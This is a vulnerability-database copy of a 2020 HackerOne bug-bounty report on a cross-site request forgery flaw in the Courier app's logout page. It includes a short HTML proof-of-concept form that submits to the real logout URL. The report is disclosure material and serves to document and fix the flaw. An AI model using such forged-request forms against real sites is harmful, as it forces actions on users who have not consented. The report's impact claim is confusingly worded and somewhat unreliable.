Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneHackerboy404H1:905831
HistoryJun 23, 2020 - 5:17 a.m.

Courier: Logout page does not prevent CSRF

2020-06-2305:17:34
hackerboy404
hackerone.com
209
JSON

Summary:

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. … If the victim is an administrative account, CSRF can compromise the entire web application.

Steps To Reproduce:

1.Create a CSRF logout POC using the following code.
Code That i use:–
<html>

<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=“https://www.trycourier.app/logout”>
<input type=“submit” value=“Submit request” />
</form>
</body>
</html>

Supporting Material/References:

I have provided a attack senirio for it please check it

Impact

Logout any victim into the attacker account, send the HTML made by attacker and then logout him from the Session.

The hacker selected the Cross-Site Request Forgery (CSRF) weakness. This vulnerability type requires contextual information from the hacker.

JSON